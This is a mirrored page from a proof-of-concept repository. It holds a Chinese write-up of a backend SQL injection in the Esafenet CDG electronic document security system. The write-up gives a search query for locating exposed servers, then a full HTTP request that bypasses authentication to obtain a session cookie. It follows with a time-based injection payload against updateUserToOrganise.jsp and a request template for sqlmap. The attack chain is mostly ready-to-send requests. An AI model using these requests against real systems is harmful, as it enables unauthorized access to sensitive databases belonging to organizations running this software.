admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 03:17:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/亿赛通/亿赛通电子文档安全管理系统旧版/亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

3.4 KiB
Raw Blame History

亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞

一、漏洞简介

亿赛通电子文档安全管理系统简称CDG是一款电子文档安全加密软件该系统利用驱动层透明加密技术通过对电子文档的加密保护防止内部员工泄密和外部人员非法窃取企业核心重要数据资产对电子文档进行全生命周期防护系统具有透明加密、主动加密、智能加密等多种加密方式用户可根据部门涉密程度的不同如核心部门和普通部门部署力度轻重不一的梯度式文档加密防护实现技术、管理、审计进行有机的结合在内部构建起立体化的整体信息防泄露体系使得成本、效率和安全三者达到平衡实现电子文档的数据安全。亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

  • 亿赛通电子文档安全管理系统

三、资产测绘

  • hunterapp.name="ESAFENET 亿赛通文档安全管理系统"
  • 登录页面

1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png

四、漏洞复现

  1. 通过身份认证绕过漏扫获取cookie
POST /CDGServer3/LinkFilterService HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

path=BOFGGPFBFIFPBHFMGKGI&userId=GCGHGAGGFAFHFGFCFEFPFD&cur=DBNJOADCFBOPECMNBCOHMDMDKGCMMLFFCJCACB

1706457190372-a4617e08-6349-4765-8781-65369d7d4a99.png

JSESSIONID=719804E36DC9165F889264FEFC9C60C3; Path=/CDGServer3; HttpOnly
  1. sql注入
POST /CDGServer3/user/updateUserToOrganise.jsp;Service HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Content-Length: 33
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=719804E36DC9165F889264FEFC9C60C3; Path=/CDGServer3; HttpOnly
Accept-Encoding: gzip

userId=1';WAITFOR DELAY '0:0:1'--

1706457248013-9305c59d-b8d9-4f17-bcc6-b9a1707e8cce.png

  1. sqlmap
POST /CDGServer3/user/updateUserToOrganise.jsp;Service HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Content-Length: 33
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=719804E36DC9165F889264FEFC9C60C3; Path=/CDGServer3; HttpOnly
Accept-Encoding: gzip

userId=1

1706457552134-bbb6ed1c-7502-4dfb-81fe-f08c238044a8.png

更新: 2024-04-20 22:01:34
原文: https://www.yuque.com/xiaokp7/ocvun2/cfx26o5cmkgld0ga